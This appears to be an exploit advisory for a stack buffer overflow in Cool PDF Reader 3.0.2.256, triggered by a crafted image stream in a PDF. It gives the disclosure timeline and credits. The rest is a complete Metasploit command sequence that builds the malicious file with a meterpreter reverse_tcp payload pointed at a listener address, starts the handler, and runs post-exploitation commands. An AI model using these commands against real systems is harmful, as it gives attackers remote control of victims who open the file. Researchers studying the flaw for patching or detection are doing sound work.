Timeline :
Vulnerability discovered and reported to Secunia by Francis Provencher on 2012-12-19
Vulnerability publicly disclosed by Francis Provencher on 2013-01-18
Metasploit PoC provided on 2013-03-17
PoC provided by :
Francis Provencher
Chris Gabriel
juan vazquez
Reference(s) :
Affected version(s) :
Cool PDF Reader version 3.0.2.256 and earlier
Tested on Windows XP Pro SP3 with :
Cool PDF Reader 3.0.2.256
Description :
This module exploits a stack buffer overflow in Cool PDF Reader version 3.0.2.256 and earlier. The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF 3.0.2.256 on Windows XP SP3 and Windows 7 SP1.
Commands :
use exploit/windows/fileformat/coolpdf_image_stream_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit -j

sysinfo
getuid